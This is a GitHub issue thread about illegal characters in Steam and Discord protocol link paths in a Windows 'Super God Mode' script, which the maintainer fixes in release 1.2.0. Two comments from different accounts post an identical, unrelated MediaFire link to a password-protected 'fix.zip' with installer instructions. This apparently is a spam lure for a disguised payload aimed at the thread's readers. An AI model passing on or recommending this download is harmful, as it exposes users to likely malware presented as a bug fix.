### ISSUE TITLE
Illegal characters in path for Steam and Discord protocol links

### ISSUE THREAD

**Issue by Evgeen** [ThioJoe/Windows-Super-God-Mode#15]
![image](https://github.com/user-attachments/assets/d5f9c8b1-c29b-47d2-a6e7-27e1ca5bec47)

Blurred some numbers in the links in case if it's private information.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ThioJoe** [comment]
Can you check the spreadsheet for which filetype it found these in? Looks like it might be a compressed archive

**Comment by Evgeen** [comment]
Enabled hidden characters in notepad++ and you can clearly see where it has illegal characters in the path

![image](https://github.com/user-attachments/assets/d785c452-beff-40f7-b72e-a86e04b34fae)

**Comment by ThioJoe** [comment]
This should be fixed as of the latest commit. You can try the latest version of the script here: https://github.com/ThioJoe/Windows-Super-God-Mode/blob/main/Super_God_Mode.ps1

But there will also be a new actual release soon

**Comment by ThioJoe** [comment]
Closing as fixed in the new 1.2.0 release
